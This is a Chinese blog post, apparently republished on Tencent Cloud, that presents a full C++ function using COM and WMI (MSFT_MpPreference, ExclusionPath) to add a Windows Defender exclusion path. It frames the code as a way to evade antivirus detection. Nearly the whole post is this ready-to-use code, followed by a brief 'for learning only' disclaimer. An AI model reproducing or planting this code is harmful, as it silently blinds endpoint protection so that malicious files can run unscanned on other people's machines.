利用 WMI and COM 绕过windows defender
利用 WMI and COM 绕过windows defender
鸿鹄实验室
发布于 2021-11-12 09:40:38
发布于 2021-11-12 09:40:38
先知上曾经有人发过一篇利用windows defender排除项来免杀的文章,文章地址:
https://xz.aliyun.com/t/10317
而这个过程我们也可以使用代码来进行实现
INT AddDefenderExclussion(WCHAR* exclpath)
{
/*
WCHAR path[] = L"C:\\Temp";
INT res = AddDefenderExclussion(path);
if (!res)
{
::wprintf(L"[-] AddDefenderExclussion has failed\n");
}
*/
HRESULT hr;
hr = CoInitializeEx(0, COINIT_MULTITHREADED);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeEx has failed\n");
return 0;
}
hr = CoInitializeSecurity(
NULL,
-1,
NULL,
NULL,
RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE,
NULL
);
if (FAILED(hr))
{
::wprintf(L"[-] CoInitializeSecurity has failed\n");
CoUninitialize();
return 0;
}
IWbemLocator* pLoc = 0;
hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc);
if (FAILED(hr))
{
::wprintf(L"[-] CoCreateInstance has failed\n");
CoUninitialize();
return 0;
}
IWbemServices* pSvc = 0;
hr = pLoc->ConnectServer(BSTR(L"ROOT\\Microsoft\\Windows\\Defender"), NULL, NULL, 0, NULL, 0, 0, &pSvc);
if (FAILED(hr))
{
::wprintf(L"[-] ConnectServer has failed\n");
pLoc->Release();
CoUninitialize();
return 0;
}
hr = CoSetProxyBlanket(
pSvc,
RPC_C_AUTHN_WINNT,
RPC_C_AUTHZ_NONE,
NULL,
RPC_C_AUTHN_LEVEL_CALL,
RPC_C_IMP_LEVEL_IMPERSONATE,
NULL,
EOAC_NONE
);
if (FAILED(hr))
{
::wprintf(L"[-] CoSetProxyBlanket has failed\n");
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClass = 0;
BSTR Clname = BSTR(L"MSFT_MpPreference");
hr = pSvc->GetObject(Clname, 0, NULL, &pClass, NULL);
BSTR MethodName = BSTR(L"Add");
IWbemClassObject* pInSignature = 0;
hr = pClass->GetMethod(MethodName, 0, &pInSignature, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] GetMethod has failed\n");
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pClassInstance = NULL;
hr = pInSignature->SpawnInstance(0, &pClassInstance);
if (FAILED(hr))
{
::wprintf(L"[-] SpawnInstance has failed\n");
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
// Create an array
SAFEARRAYBOUND rgsaBounds[1];
rgsaBounds[0].cElements = 1;
rgsaBounds[0].lLbound = 0;
SAFEARRAY* psaStrings;
psaStrings = SafeArrayCreate(VT_BSTR, 1, rgsaBounds);
// Add a string to the array
VARIANT vString;
VariantInit(&vString);
V_VT(&vString) = VT_BSTR;
V_BSTR(&vString) = _bstr_t(exclpath);
LONG lArrayIndex = 0;
SafeArrayPutElement(psaStrings, &lArrayIndex, V_BSTR(&vString));
VariantClear(&vString);
// variant array
VARIANT vStringList;
VariantInit(&vStringList);
V_VT(&vStringList) = VT_ARRAY | VT_BSTR;
V_ARRAY(&vStringList) = psaStrings;
// Store the value for the in parameters
hr = pClassInstance->Put(L"ExclusionPath", 0, &vStringList, CIM_STRING|CIM_FLAG_ARRAY);
if (FAILED(hr))
{
::wprintf(L"[-] Put has failed %x\n", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
IWbemClassObject* pOutParams = NULL;
hr = pSvc->ExecMethod(Clname, MethodName, 0, NULL, pClassInstance, NULL, NULL);
if (FAILED(hr))
{
::wprintf(L"[-] ExecMethod has failed %x\n", hr);
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pSvc->Release();
pLoc->Release();
CoUninitialize();
return 0;
}
VariantClear(&vStringList);
pClassInstance->Release();
pInSignature->Release();
pClass->Release();
pLoc->Release();
pSvc->Release();
CoUninitialize();
return 1;
}代码来自:https://stmxcsr.com/micro/
除此之外,网站还有很多其他的功能实现,推荐阅读使用。
请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-11-10,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读